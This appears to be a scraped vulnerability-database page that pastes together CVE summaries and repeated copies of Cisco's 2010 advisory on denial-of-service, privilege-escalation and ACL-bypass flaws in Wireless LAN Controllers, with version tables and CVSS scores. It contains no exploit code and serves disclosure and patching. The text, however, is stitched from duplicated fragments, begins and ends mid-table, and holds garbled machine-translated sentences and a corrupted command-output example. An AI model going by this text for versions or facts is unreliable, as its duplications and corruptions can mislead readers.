|----------------------+--------------------------------------------| | 4.2M | 4.2.207.54M | |----------------------+--------------------------------------------| | 5.0 | Vulnerable; Migrate to 6.0 | |----------------------+--------------------------------------------| | 5.1 | Vulnerable; Migrate to 6.0 | |----------------------+--------------------------------------------| | 5.2 | Non FIPS Customers migrate to 6.0 | |----------------------+--------------------------------------------| | 6.0 | 6.0.199.4 | |----------------------+--------------------------------------------| | 7.0 | Not Vulnerable | +-------------------------------------------------------------------+ Note: Cisco WLC Software version 5.2.193.11 is a FIPS certified image. Customers not running FIPS images are recommended to migrate to Cisco WLC software 6.0.199.4 or later. Customers running 4.1M with a mixture of LAP1505/LAP1510 and LAP1522/ LAP1524 units will need to refer to the Mesh and Mainstream Releases on the Controller section of the document Cisco Wireless Mesh Access Points, Design and Deployment Guide, Release 7.0. Workarounds =========== There are no available workarounds to mitigate any of these vulnerabilities. Additional mitigations that can be deployed on Cisco devices in the network are available in the Cisco Applied Mitigation Bulletin companion document for this advisory, which is available at the following link: http://www.cisco.com/warp/public/707/cisco-amb-20100908-wlc.shtml Obtaining Fixed Software ======================== Cisco has released free software updates that address these vulnerabilities. Prior to deploying software, customers should consult their maintenance provider or check the software for feature set compatibility and known issues specific to their environment. Customers may only install and expect support for the feature sets they have purchased. By installing, downloading, accessing or otherwise using such software upgrades, customers agree to be bound by the terms of Cisco's software license terms found at: http://www.cisco.com/en/US/docs/general/warranty/English/EU1KEN_.html or as otherwise set forth at Cisco.com Downloads at: http://www.cisco.com/public/sw-center/sw-usingswc.shtml Do not contact psirt@cisco.com or security-alert@cisco.com for software upgrades. Customers with Service Contracts +------------------------------- Customers with contracts should obtain upgraded software through their regular update channels. For most customers, this means that upgrades should be obtained through the Software Center on Cisco's worldwide website at http://www.cisco.com. Customers without Service Contracts +---------------------------------- Customers who purchase direct from Cisco but do not hold a Cisco service contract, and customers who purchase through third-party vendors but are unsuccessful in obtaining fixed software through their point of sale should acquire upgrades by contacting the Cisco Technical Assistance Center (TAC). TAC contacts are as follows. * +1 800 553 2447 (toll free from within North America) * +1 408 526 7209 (toll call from anywhere in the world) * e-mail: tac@cisco.com Customers should have their product serial number available and be prepared to give the URL of this notice as evidence of entitlement to a free upgrade. Free upgrades for non-contract customers must be requested through the TAC. Refer to: http://www.cisco.com/en/US/support/tsd_cisco_worldwide_contacts.html for additional TAC contact information, including localized telephone numbers, and instructions and e-mail addresses for use in various languages. Exploitation and Public Announcements ===================================== The Cisco PSIRT is not aware of any public announcements or malicious use of the vulnerabilities described in this advisory. These vulnerabilities were found during internal testing and during the troubleshooting of customer service requests. Status of this Notice: FINAL ============================ THIS DOCUMENT IS PROVIDED ON AN "AS IS" BASIS AND DOES NOT IMPLY ANY KIND OF GUARANTEE OR WARRANTY, INCLUDING THE WARRANTIES OF MERCHANTABILITY OR FITNESS FOR A PARTICULAR USE. YOUR USE OF THE INFORMATION ON THE DOCUMENT OR MATERIALS LINKED FROM THE DOCUMENT IS AT YOUR OWN RISK. CISCO RESERVES THE RIGHT TO CHANGE OR UPDATE THIS DOCUMENT AT ANY TIME. A stand-alone copy or Paraphrase of the text of this document that omits the distribution URL in the following section is an uncontrolled copy, and may lack important information or contain factual errors. Distribution ============ This advisory is posted on Cisco's worldwide website at: http://www.cisco.com/warp/public/707/cisco-sa-20100908-wlc.shtml In addition to worldwide web posting, a text version of this notice is clear-signed with the Cisco PSIRT PGP key and is posted to the following e-mail and Usenet news recipients. * cust-security-announce@cisco.com * first-bulletins@lists.first.org * bugtraq@securityfocus.com * vulnwatch@vulnwatch.org * cisco@spot.colorado.edu * cisco-nsp@puck.nether.net * full-disclosure@lists.grok.org.uk * comp.dcom.sys.cisco@newsgate.cisco.com Future updates of this advisory, if any, will be placed on Cisco's worldwide website, but may or may not be actively announced on mailing lists or newsgroups. Users concerned about this problem are encouraged to check the above URL for any updates. Revision History ================ +-----------------------------------------+ | Revision | | Initial | | 1.0 | 2010-September-08 | public | | | | release. | +-----------------------------------------+ Cisco Security Procedures ========================= Complete information on reporting security vulnerabilities in Cisco products, obtaining assistance with security incidents, and registering to receive security information from Cisco, is available on Cisco's worldwide website at: http://www.cisco.com/en/US/products/products_security_vulnerability_policy.html This includes instructions for press inquiries regarding Cisco security notices. All Cisco security advisories are available at: http://www.cisco.com/go/psirt -----BEGIN PGP SIGNATURE----- iD8DBQFMh6MB86n/Gc8U/uARAkAoAJ49gL4UWcPviOVj7qBoEjTA0tLQ4QCfTlem QI2QHDaZGejlgOifWafhaW8= =518m -----END PGP SIGNATURE-----

Unspecified vulnerability in Cisco Wireless LAN Controller (WLC) software 4.2 before 4.2.209.0; 4.2M before 4.2.207.54M; 5.0, 5.1, and 6.0 before 6.0.196.0; and 5.2 before 5.2.193.11 allows remote authenticated users to cause a denial of service (device reload) via crafted HTTP packets that trigger invalid arguments to the emweb component, aka Bug ID CSCtd16938. The Cisco Wireless LAN Controller is used to manage Cisco Aironet access point applications using the Lightweight Access Point Protocol (LWAPP). A verified attacker can send a large number of malformed HTTP messages to the affected Cisco WLC, which can cause device overloading. Vulnerabilities can be exploited in both wireless and wired segments. A successful three-way TCP handshake is required to successfully exploit the vulnerability. This issue is documented by Cisco Bug ID CSCtd16938. Unspecified vulnerabilities exist in Cisco Wireless LAN Controller (WLC) Software 4.2 prior to 4.2.209.0; 4.2M prior to 4.2.207.54M; 5.0, 5.1, and 6.0 prior to 6.0.196.0, and 5.2 prior to 5.2.193.11. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Cisco Security Advisory: Multiple Vulnerabilities in Cisco Wireless LAN Controllers Advisory ID: cisco-sa-20100908-wlc Revision 1.0 For Public Release 2010 September 08 1600 UTC (GMT) +--------------------------------------------------------------------- Summary ======= The Cisco Wireless LAN Controller (WLC) product family is affected by these vulnerabilities: * Two denial of service (DoS) vulnerabilities * Three privilege escalation vulnerabilities * Two access control list (ACL) bypass vulnerabilities Note: These vulnerabilities are independent of one another. A device may be affected by one vulnerability and not affected by another. Cisco has released free software updates that address these vulnerabilities. There are no workarounds to mitigate these vulnerabilities. This advisory is posted at: http://www.cisco.com/warp/public/707/cisco-sa-20100908-wlc.shtml Affected Products ================= Vulnerable Products +------------------ These products are each affected by at least one vulnerability covered in this Security Advisory: * Cisco 2000 Series WLCs * Cisco 2100 Series WLCs * Cisco 4100 Series WLCs * Cisco 4400 Series WLCs * Cisco 5500 Series WLCs * Cisco Wireless Services Modules (WiSMs) * Cisco WLC Modules for Integrated Services Routers (ISRs) * Cisco Catalyst 3750G Integrated WLCs DoS Vulnerabilities ~~~~~~~~~~~~~~~~~~~ The Cisco WLC product family is affected by two DoS vulnerabilities: * Internet Key Exchange (IKE) DoS Vulnerability * HTTP DoS Vulnerability The IKE DoS vulnerability affects Cisco WLC software versions 3.2 and later. The HTTP DoS vulnerability affects Cisco WLC software versions 4.2 and later. Privilege Escalation Vulnerabilities ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ The privilege escalation vulnerabilities affect Cisco WLC software versions 4.2 and later. CPU ACL Bypass Vulnerabilities ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ One of the two ACL bypass vulnerabilities affects Cisco WLC software versions 4.1 and later. The second ACL bypass vulnerability affects Cisco WLC software versions 6.0.x. Determination of Software Versions ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Administrators can use these instructions to determine the software version that is running on the Cisco WLCs (using the web or command-line interface) or on the Cisco WiSM (using commands on the Cisco Catalyst 6500 Series Switch and Cisco 7600 Series Router). Cisco Wireless Controllers ~~~~~~~~~~~~~~~~~~~~~~~~~~ To determine the WLC version that is running in a given environment, use one of these methods: * In the web interface, choose the "Monitor" tab, click "Summary" in the left pane, and note the "Software" Version field. Note: Customers who use a Cisco WLC Module in an ISR will need to issue the "service-module wlan-controller <slot/port> session" command prior to performing the next step on the command line. Customers who use a Cisco Catalyst 3750G Switch with an integrated WLC Module will need to issue the "session <Stack-Member-Number> processor 1 session" command prior to performing the next step on the command line. * From the command-line interface, type "show sysinfo" and note the "Product Version" field, as shown in this example: (Cisco Controller)> show sysinfo Manufacturer's Name.. Cisco Systems Inc. Product Name......... Cisco Controller Product Version...... 5.1.151.0 RTOS Version......... Linux-2.6.10_mvl401 Bootloader Version... 4.0.207.0 Build Type........... DATA + WPS <output suppressed> Cisco WiSMs ~~~~~~~~~~~ Use the "show wism module <module number> controller 1 status" command on a Cisco Catalyst 6500 Series Switch and Cisco 7600 Series Router if they are using a WiSM. Note the software version as demonstrated in this example, which shows version 5.1.151.0: Router# show wism module 3 controller 1 status WiSM Controller 1 in Slot 3 Operational Status of the Controller : Oper-Up Service VLAN : 192 Service Port : 10 Service Port Mac Address : 0011.92ff.8742 Service IP Address : 192.168.10.1 Management IP Address : 192.168.1.123 Software Version : 5.1.151.0 Port Channel Number : 288 Allowed vlan list : 30,40 Native VLAN ID : 40 WCP Keep Alive Missed : 0 Products Confirmed Not Vulnerable +-------------------------------- No other Cisco products are currently known to be affected by these vulnerabilities. Details ======= Cisco WLCs and Cisco WiSMs are responsible for system-wide wireless LAN functions, such as security policies, intrusion prevention, RF management, quality of service (QoS), and mobility. The Cisco WLC family of devices is affected by 2 denial of service vulnerabilities, 3 privilege escalation vulnerabilities, and 2 access control list bypass vulnerabilities. The following are the details about these vulnerabilities. Note: IKE is enabled by default in the WLC and cannot be disabled. Only traffic destined to the Cisco WLC could trigger this vulnerability. Transient traffic will not trigger this vulnerability. Note: Only traffic destined to the Cisco WLC could trigger this vulnerability. Transient traffic will not trigger this vulnerability. WebAuth or guest access is not affected by this vulnerability. Privilege Escalation Vulnerabilities ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Three privilege escalation vulnerabilities exist in the Cisco WLCs that could allow an authenticated attacker with read-only privileges to modify the device configuration. Access Control List Bypass Vulnerabilities ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ACLs can be configured in the Cisco WLCs and applied to data traffic to and from wireless clients or to all traffic that is destined for the controller CPU. After ACLs are defined, they can be applied to the management interface, the access point manager (AP-manager) interface, or any of the dynamic interfaces for client data traffic or to the Network Processing Unit (NPU) interface for traffic to the controller CPU. Two vulnerabilities exist in the Cisco WLCs that could allow an unauthenticated attacker to bypass policies that should be enforced by CPU-based ACLs. No other ACL types are affected by these vulnerabilities. Note: CPU-based ACLs are configured and applied by navigating to Security > Access Control Lists > CPU Access Control Lists in the Cisco WLC web management interface. Vulnerability Scoring Details ============================= Cisco has provided scores for the vulnerabilities in this advisory based on the Common Vulnerability Scoring System (CVSS). The CVSS scoring in this Security Advisory is done in accordance with CVSS version 2.0. CVSS is a standards-based scoring method that conveys vulnerability severity and helps determine urgency and priority of response. Cisco has provided a base and temporal score. Customers can then compute environmental scores to assist in determining the impact of the vulnerability in individual networks. Cisco has provided an FAQ to answer additional questions regarding CVSS at: http://www.cisco.com/web/about/security/intelligence/cvss-qandas.html Cisco has also provided a CVSS calculator to help compute the environmental impact for individual networks at: http://intellishield.cisco.com/security/alertmanager/cvss CSCta56653 - WLC may reload when receiving crafted IKE packets CVSS Base Score - 7.8 Access Vector - Network Access Complexity - Low Authentication - None Confidentiality Impact - None Integrity Impact - None Availability Impact - Complete CVSS Temporal Score - 6.4 Exploitability - Functional Remediation Level - Official-Fix Report Confidence - Confirmed CSCtd16938 - WLC crash after passing invalid arguments to emweb CVSS Base Score - 6.8 Access Vector - Network Access Complexity - Low Authentication - Single Confidentiality Impact - None Integrity Impact - None Availability Impact - Complete CVSS Temporal Score - 5.6 Exploitability - Functional Remediation Level - Official-Fix Report Confidence - Confirmed CSCtc91431, CSCsz66726, and CSCtc93837- Privilege Escalation vulnerabilities CVSS Base Score - 9.0 Access Vector - Network Access Complexity - Low Authentication - Single Confidentiality Impact - Complete Integrity Impact - Complete Availability Impact - Complete CVSS Temporal Score - 7.8 Exploitability - Functional Remediation Level - Official-Fix Report Confidence - Confirmed CSCta66931, CSCtf36051 - CPU ACL bypass vulnerabilities CVSS Base Score - 5.0 Access Vector - Network Access Complexity - Low Authentication - None Confidentiality Impact - Partial Integrity Impact - None Availability Impact - None CVSS Temporal Score - 4.1 Exploitability - Functional Remediation Level - Official-Fix Report Confidence - Confirmed Impact ====== Successful exploitation of the DoS vulnerabilities could cause an affected device to reload. Repeated exploitation could result in a sustained DoS condition. Successful exploitation of the privilege escalation vulnerabilities could allow an authenticated attacker with read-only privileges to modify the device configuration. Successful exploitation of the ACL bypass vulnerabilities could allow an attacker to bypass policies that should be enforced by CPU-based ACLs. Software Versions and Fixes =========================== When considering software upgrades, also consult: http://www.cisco.com/go/psirt and any subsequent advisories to determine exposure and a complete upgrade solution. In all cases, customers should exercise caution to be certain the devices to be upgraded contain sufficient memory and that current hardware and software configurations will continue to be supported properly by the new release. If the information is not clear, contact the Cisco Technical Assistance Center (TAC) or your contracted maintenance provider for assistance. If a given release train is vulnerable, then the earliest possible releases that contain the fix (along with the anticipated date of availability for each, if applicable) are listed in the "First Fixed Release" column of the table. A device running a release in the given train that is earlier than the release in a specific column (less than the First Fixed Release) is known to be vulnerable. +-------------------------------------------------------------------+ | Vulnerability/Bug ID | Affected | First Fixed | | | Release | Version | |----------------------------------------+----------+---------------| | | 3.2 | 3.2.215.0 | | |----------+---------------| | | | Vulnerable; | | | 4.1 | Migrate to | | | | 4.2 | | |----------+---------------| | | | Vulnerable; | | | 4.1M | Migrate to | | | | 4.2M | | |----------+---------------| | | 4.2 | 4.2.205.0 | | |----------+---------------| | | 4.2M | 4.2.207.54M | | IKE DoS Vulnerability (CSCta56653) |----------+---------------| | | | Vulnerable; | | | 5.0 | Migrate to | | | | 6.0 | | |----------+---------------| | | | Vulnerable; | | | 5.1 | Migrate to | | | | 6.0 | | |----------+---------------| | | 5.2 | 5.2.193.11 | | |----------+---------------| | | 6.0 | 6.0.188.0 | | |----------+---------------| | | 7.0 | Not | | | | Vulnerable | |----------------------------------------+----------+---------------| | | 3.2 | Not | | | | Vulnerable | | |----------+---------------| | | 4.1 | Not | | | | Vulnerable | | |----------+---------------| | | 4.1M | Not | | | | Vulnerable | | |----------+---------------| | | 4.2 | 4.2.209.0 | | |----------+---------------| | | 4.2M | 4.2.207.54M | | |----------+---------------| | HTTP DoS Vulnerability (CSCtd16938) | | Vulnerable; | | | 5.0 | Migrate to | | | | 6.0 | | |----------+---------------| | | | Vulnerable; | | | 5.1 | Migrate to | | | | 6.0 | | |----------+---------------| | | 5.2 | 5.2.193.11 | | |----------+---------------| | | 6.0 | 6.0.196.0 | | |----------+---------------| | | 7.0 | Not | | | | Vulnerable | |----------------------------------------+----------+---------------| | | 3.2 | Not | | | | Vulnerable | | |----------+---------------| | | | Vulnerable; | | | 4.1 | Migrate to | | | | 4.2 | | |----------+---------------| | | | Vulnerable; | | | 4.1 M | Migrate to | | | | 4.2M | | |----------+---------------| | | 4.2 | 4.2.209.0 | | |----------+---------------| | Privilege Escalation Vulnerabilities | 4.2M | 4.2.207.54M | | (CSCtc91431, CSCsz66726, and |----------+---------------| | CSCtc93837) | | Vulnerable; | | | 5.0 | Migrate to | | | | 6.0 | | |----------+---------------| | | | Vulnerable; | | | 5.1 | Migrate to | | | | 6.0 | | |----------+---------------| | | 5.2 | 5.2.193.11 | | |----------+---------------| | | 6.0 | 6.0.188.0 | | |----------+---------------| | | 7.0 | Not | | | | Vulnerable | |----------------------------------------+----------+---------------| | | 3.2 | Not | | | | Vulnerable | | |----------+---------------| | | 4.1 | Not | | | | Vulnerable | | |----------+---------------| | | 4.1M | Not | | | | Vulnerable | | |----------+---------------| | | 4.2 | 4.2.207.0 | | |----------+---------------| | | 4.2M | 4.2.207.54M | | |----------+---------------| | ACL Bypass Vulnerabilities (CSCta66931 | | Vulnerable; | | and CSCtf36051) | 5.0 | Migrate to | | | | 6.0 | | |----------+---------------| | | | Vulnerable; | | | 5.1 | Migrate to | | | | 6.0 | | |----------+---------------| | | 5.2 | Not | | | | Vulnerable | | |----------+---------------| | | 6.0 | 6.0.199.0 | | |----------+---------------| | | 7.0 | Not | | | | Vulnerable | +-------------------------------------------------------------------+ Recommended Releases ~~~~~~~~~~~~~~~~~~~~ The "Recommended Release" table lists the releases which have fixes for all the published vulnerabilities at the time of this Advisory. Cisco recommends upgrading to a release equal to or later than the release in the "Recommended Releases" table. +-------------------------------------------------------------------+ | Affected Release | Recommended Release | |----------------------+--------------------------------------------| | 3.2 | 3.2.215.0 | |----------------------+--------------------------------------------| | 4.1 | Vulnerable; Migrate to 4.2 | |----------------------+--------------------------------------------| | 4.1M | Vulnerable; Migrate to 4.2M | |----------------------+--------------------------------------------| | 4.2 | 4.2.209.0 | |----------------------+--------------------------------------------| | 4.2M | 4.2.207.54M | |----------------------+--------------------------------------------| | 5.0 | Vulnerable; Migrate to 6.0 | |----------------------+--------------------------------------------| | 5.1 | Vulnerable; Migrate to 6.0 | |----------------------+--------------------------------------------| | 5.2 | Non FIPS Customers migrate to 6.0 | |----------------------+--------------------------------------------| | 6.0 | 6.0.199.4 | |----------------------+--------------------------------------------| | 7.0 | Not Vulnerable | +-------------------------------------------------------------------+ Note: Cisco WLC Software version 5.2.193.11 is a FIPS certified image. Customers not running FIPS images are recommended to migrate to Cisco WLC software 6.0.199.4 or later. Customers running 4.1M with a mixture of LAP1505/LAP1510 and LAP1522/ LAP1524 units will need to refer to the Mesh and Mainstream Releases on the Controller section of the document Cisco Wireless Mesh Access Points, Design and Deployment Guide, Release 7.0. Workarounds =========== There are no available workarounds to mitigate any of these vulnerabilities. Additional mitigations that can be deployed on Cisco devices in the network are available in the Cisco Applied Mitigation Bulletin companion document for this advisory, which is available at the following link: http://www.cisco.com/warp/public/707/cisco-amb-20100908-wlc.shtml Obtaining Fixed Software ======================== Cisco has released free software updates that address these vulnerabilities. Prior to deploying software, customers should consult their maintenance provider or check the software for feature set compatibility and known issues specific to their environment. Customers may only install and expect support for the feature sets they have purchased. By installing, downloading, accessing or otherwise using such software upgrades, customers agree to be bound by the terms of Cisco's software license terms found at: http://www.cisco.com/en/US/docs/general/warranty/English/EU1KEN_.html or as otherwise set forth at Cisco.com Downloads at: http://www.cisco.com/public/sw-center/sw-usingswc.shtml Do not contact psirt@cisco.com or security-alert@cisco.com for software upgrades. Customers with Service Contracts +------------------------------- Customers with contracts should obtain upgraded software through their regular update channels. For most customers, this means that upgrades should be obtained through the Software Center on Cisco's worldwide website at http://www.cisco.com. Customers without Service Contracts +---------------------------------- Customers who purchase direct from Cisco but do not hold a Cisco service contract, and customers who purchase through third-party vendors but are unsuccessful in obtaining fixed software through their point of sale should acquire upgrades by contacting the Cisco Technical Assistance Center (TAC). TAC contacts are as follows. * +1 800 553 2447 (toll free from within North America) * +1 408 526 7209 (toll call from anywhere in the world) * e-mail: tac@cisco.com Customers should have their product serial number available and be prepared to give the URL of this notice as evidence of entitlement to a free upgrade. Free upgrades for non-contract customers must be requested through the TAC. Refer to: http://www.cisco.com/en/US/support/tsd_cisco_worldwide_contacts.html for additional TAC contact information, including localized telephone numbers, and instructions and e-mail addresses for use in various languages. Exploitation and Public Announcements ===================================== The Cisco PSIRT is not aware of any public announcements or malicious use of the vulnerabilities described in this advisory. These vulnerabilities were found during internal testing and during the troubleshooting of customer service requests. Status of this Notice: FINAL ============================ THIS DOCUMENT IS PROVIDED ON AN "AS IS" BASIS AND DOES NOT IMPLY ANY KIND OF GUARANTEE OR WARRANTY, INCLUDING THE WARRANTIES OF MERCHANTABILITY OR FITNESS FOR A PARTICULAR USE. YOUR USE OF THE INFORMATION ON THE DOCUMENT OR MATERIALS LINKED FROM THE DOCUMENT IS AT YOUR OWN RISK. CISCO RESERVES THE RIGHT TO CHANGE OR UPDATE THIS DOCUMENT AT ANY TIME. A stand-alone copy or Paraphrase of the text of this document that omits the distribution URL in the following section is an uncontrolled copy, and may lack important information or contain factual errors. Distribution ============ This advisory is posted on Cisco's worldwide website at: http://www.cisco.com/warp/public/707/cisco-sa-20100908-wlc.shtml In addition to worldwide web posting, a text version of this notice is clear-signed with the Cisco PSIRT PGP key and is posted to the following e-mail and Usenet news recipients. * cust-security-announce@cisco.com * first-bulletins@lists.first.org * bugtraq@securityfocus.com * vulnwatch@vulnwatch.org * cisco@spot.colorado.edu * cisco-nsp@puck.nether.net * full-disclosure@lists.grok.org.uk * comp.dcom.sys.cisco@newsgate.cisco.com Future updates of this advisory, if any, will be placed on Cisco's worldwide website, but may or may not be actively announced on mailing lists or newsgroups. Users concerned about this problem are encouraged to check the above URL for any updates. Revision History ================ +-----------------------------------------+ | Revision | | Initial | | 1.0 | 2010-September-08 | public | | | | release. | +-----------------------------------------+ Cisco Security Procedures ========================= Complete information on reporting security vulnerabilities in Cisco products, obtaining assistance with security incidents, and registering to receive security information from Cisco, is available on Cisco's worldwide website at: http://www.cisco.com/en/US/products/products_security_vulnerability_policy.html This includes instructions for press inquiries regarding Cisco security notices. All Cisco security advisories are available at: http://www.cisco.com/go/psirt -----BEGIN PGP SIGNATURE----- iD8DBQFMh6MB86n/Gc8U/uARAkAoAJ49gL4UWcPviOVj7qBoEjTA0tLQ4QCfTlem QI2QHDaZGejlgOifWafhaW8= =518m -----END PGP SIGNATURE-----

Cisco Wireless LAN Controller (WLC) software, possibly 6.0.x or possibly 4.1 through 6.0.x, allows remote attackers to bypass ACLs in the controller CPU, and consequently send network traffic to unintended segments or devices, via unspecified vectors, a different vulnerability than CVE-2010-0575. Cisco Wireless LAN Controller (WLC) The controller CPU At the inner, ACL There is a vulnerability that can be avoided. The Cisco Wireless LAN Controller is used to manage Cisco Aironet access point applications using the Lightweight Access Point Protocol (LWAPP). After defining the ACLs, it can be referenced on the management interface, on the access point management (AP-manager) interface, and any dynamic interface for client data communication or a network processing unit (NPU) interface to the controller CPU. Two security vulnerabilities in Cisco WLCs allow unauthenticated attackers to bypass CPU-based ACLs. The Cisco Wireless LAN Controller (WLC) is responsible for system-wide wireless LAN functions such as security policy, intrusion detection, RF management, quality of service (QoS), and mobility. An attacker can exploit this issue to bypass certain security restrictions. This issue is being tracked by Cisco BugID CSCtf36051. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Cisco Security Advisory: Multiple Vulnerabilities in Cisco Wireless LAN Controllers Advisory ID: cisco-sa-20100908-wlc Revision 1.0 For Public Release 2010 September 08 1600 UTC (GMT) +--------------------------------------------------------------------- Summary ======= The Cisco Wireless LAN Controller (WLC) product family is affected by these vulnerabilities: * Two denial of service (DoS) vulnerabilities * Three privilege escalation vulnerabilities * Two access control list (ACL) bypass vulnerabilities Note: These vulnerabilities are independent of one another. A device may be affected by one vulnerability and not affected by another. Cisco has released free software updates that address these vulnerabilities. There are no workarounds to mitigate these vulnerabilities. This advisory is posted at: http://www.cisco.com/warp/public/707/cisco-sa-20100908-wlc.shtml Affected Products ================= Vulnerable Products +------------------ These products are each affected by at least one vulnerability covered in this Security Advisory: * Cisco 2000 Series WLCs * Cisco 2100 Series WLCs * Cisco 4100 Series WLCs * Cisco 4400 Series WLCs * Cisco 5500 Series WLCs * Cisco Wireless Services Modules (WiSMs) * Cisco WLC Modules for Integrated Services Routers (ISRs) * Cisco Catalyst 3750G Integrated WLCs DoS Vulnerabilities ~~~~~~~~~~~~~~~~~~~ The Cisco WLC product family is affected by two DoS vulnerabilities: * Internet Key Exchange (IKE) DoS Vulnerability * HTTP DoS Vulnerability The IKE DoS vulnerability affects Cisco WLC software versions 3.2 and later. The HTTP DoS vulnerability affects Cisco WLC software versions 4.2 and later. Determination of Software Versions ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Administrators can use these instructions to determine the software version that is running on the Cisco WLCs (using the web or command-line interface) or on the Cisco WiSM (using commands on the Cisco Catalyst 6500 Series Switch and Cisco 7600 Series Router). Cisco Wireless Controllers ~~~~~~~~~~~~~~~~~~~~~~~~~~ To determine the WLC version that is running in a given environment, use one of these methods: * In the web interface, choose the "Monitor" tab, click "Summary" in the left pane, and note the "Software" Version field. Note: Customers who use a Cisco WLC Module in an ISR will need to issue the "service-module wlan-controller <slot/port> session" command prior to performing the next step on the command line. Customers who use a Cisco Catalyst 3750G Switch with an integrated WLC Module will need to issue the "session <Stack-Member-Number> processor 1 session" command prior to performing the next step on the command line. * From the command-line interface, type "show sysinfo" and note the "Product Version" field, as shown in this example: (Cisco Controller)> show sysinfo Manufacturer's Name.. Cisco Systems Inc. Product Name......... 5.1.151.0 RTOS Version......... Linux-2.6.10_mvl401 Bootloader Version... 4.0.207.0 Build Type........... DATA + WPS <output suppressed> Cisco WiSMs ~~~~~~~~~~~ Use the "show wism module <module number> controller 1 status" command on a Cisco Catalyst 6500 Series Switch and Cisco 7600 Series Router if they are using a WiSM. Note the software version as demonstrated in this example, which shows version 5.1.151.0: Router# show wism module 3 controller 1 status WiSM Controller 1 in Slot 3 Operational Status of the Controller : Oper-Up Service VLAN : 192 Service Port : 10 Service Port Mac Address : 0011.92ff.8742 Service IP Address : 192.168.10.1 Management IP Address : 192.168.1.123 Software Version : 5.1.151.0 Port Channel Number : 288 Allowed vlan list : 30,40 Native VLAN ID : 40 WCP Keep Alive Missed : 0 Products Confirmed Not Vulnerable +-------------------------------- No other Cisco products are currently known to be affected by these vulnerabilities. The Cisco WLC family of devices is affected by 2 denial of service vulnerabilities, 3 privilege escalation vulnerabilities, and 2 access control list bypass vulnerabilities. The following are the details about these vulnerabilities. IKE Denial of Service Vulnerability ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ An attacker with the ability to send a malicious IKE packet to an affected Cisco WLC could cause the device to crash and reload. This vulnerability can be exploited from both wired and wireless segments. Note: IKE is enabled by default in the WLC and cannot be disabled. Transient traffic will not trigger this vulnerability. This vulnerability is documented in Cisco Bug ID CSCta56653 and has been assigned Common Vulnerabilities and Exposures (CVE) ID CVE-2010-0574. HTTP Denial of Service Vulnerability ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ An authenticated attacker with the ability to send a series of malicious HTTP packets to an affected Cisco WLC could cause the device to reload. This vulnerability can be exploited from both wired and wireless segments. A TCP three-way handshake is needed in order to exploit this vulnerability. Transient traffic will not trigger this vulnerability. WebAuth or guest access is not affected by this vulnerability. This vulnerability is documented in Cisco Bug ID CSCtd16938 and has been assigned CVE ID CVE-2010-2841. Privilege Escalation Vulnerabilities ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Three privilege escalation vulnerabilities exist in the Cisco WLCs that could allow an authenticated attacker with read-only privileges to modify the device configuration. These vulnerabilities are documented in Cisco Bug IDs CSCtc91431, CSCsz66726, and CSCtc93837; and have been assigned CVE IDs CVE-2010-2842, CVE-2010-2843, and CVE-2010-3033. No other ACL types are affected by these vulnerabilities. When CPU-based ACLs are enabled, they are applicable to both wireless and wired traffic. These vulnerabilities are documented in Cisco Bug IDs CSCta66931, and CSCtf36051; and have been assigned CVE IDs CVE-2010-0575 and CVE-2010-3034. Vulnerability Scoring Details ============================= Cisco has provided scores for the vulnerabilities in this advisory based on the Common Vulnerability Scoring System (CVSS). The CVSS scoring in this Security Advisory is done in accordance with CVSS version 2.0. CVSS is a standards-based scoring method that conveys vulnerability severity and helps determine urgency and priority of response. Cisco has provided a base and temporal score. Customers can then compute environmental scores to assist in determining the impact of the vulnerability in individual networks. Cisco has provided an FAQ to answer additional questions regarding CVSS at: http://www.cisco.com/web/about/security/intelligence/cvss-qandas.html Cisco has also provided a CVSS calculator to help compute the environmental impact for individual networks at: http://intellishield.cisco.com/security/alertmanager/cvss CSCta56653 - WLC may reload when receiving crafted IKE packets CVSS Base Score - 7.8 Access Vector - Network Access Complexity - Low Authentication - None Confidentiality Impact - None Integrity Impact - None Availability Impact - Complete CVSS Temporal Score - 6.4 Exploitability - Functional Remediation Level - Official-Fix Report Confidence - Confirmed CSCtd16938 - WLC crash after passing invalid arguments to emweb CVSS Base Score - 6.8 Access Vector - Network Access Complexity - Low Authentication - Single Confidentiality Impact - None Integrity Impact - None Availability Impact - Complete CVSS Temporal Score - 5.6 Exploitability - Functional Remediation Level - Official-Fix Report Confidence - Confirmed CSCtc91431, CSCsz66726, and CSCtc93837- Privilege Escalation vulnerabilities CVSS Base Score - 9.0 Access Vector - Network Access Complexity - Low Authentication - Single Confidentiality Impact - Complete Integrity Impact - Complete Availability Impact - Complete CVSS Temporal Score - 7.8 Exploitability - Functional Remediation Level - Official-Fix Report Confidence - Confirmed CSCta66931, CSCtf36051 - CPU ACL bypass vulnerabilities CVSS Base Score - 5.0 Access Vector - Network Access Complexity - Low Authentication - None Confidentiality Impact - Partial Integrity Impact - None Availability Impact - None CVSS Temporal Score - 4.1 Exploitability - Functional Remediation Level - Official-Fix Report Confidence - Confirmed Impact ====== Successful exploitation of the DoS vulnerabilities could cause an affected device to reload. Repeated exploitation could result in a sustained DoS condition. Successful exploitation of the privilege escalation vulnerabilities could allow an authenticated attacker with read-only privileges to modify the device configuration. Software Versions and Fixes =========================== When considering software upgrades, also consult: http://www.cisco.com/go/psirt and any subsequent advisories to determine exposure and a complete upgrade solution. In all cases, customers should exercise caution to be certain the devices to be upgraded contain sufficient memory and that current hardware and software configurations will continue to be supported properly by the new release. If the information is not clear, contact the Cisco Technical Assistance Center (TAC) or your contracted maintenance provider for assistance. If a given release train is vulnerable, then the earliest possible releases that contain the fix (along with the anticipated date of availability for each, if applicable) are listed in the "First Fixed Release" column of the table. A device running a release in the given train that is earlier than the release in a specific column (less than the First Fixed Release) is known to be vulnerable. +-------------------------------------------------------------------+ | Vulnerability/Bug ID | Affected | First Fixed | | | Release | Version | |----------------------------------------+----------+---------------| | | 3.2 | 3.2.215.0 | | |----------+---------------| | | | Vulnerable; | | | 4.1 | Migrate to | | | | 4.2 | | 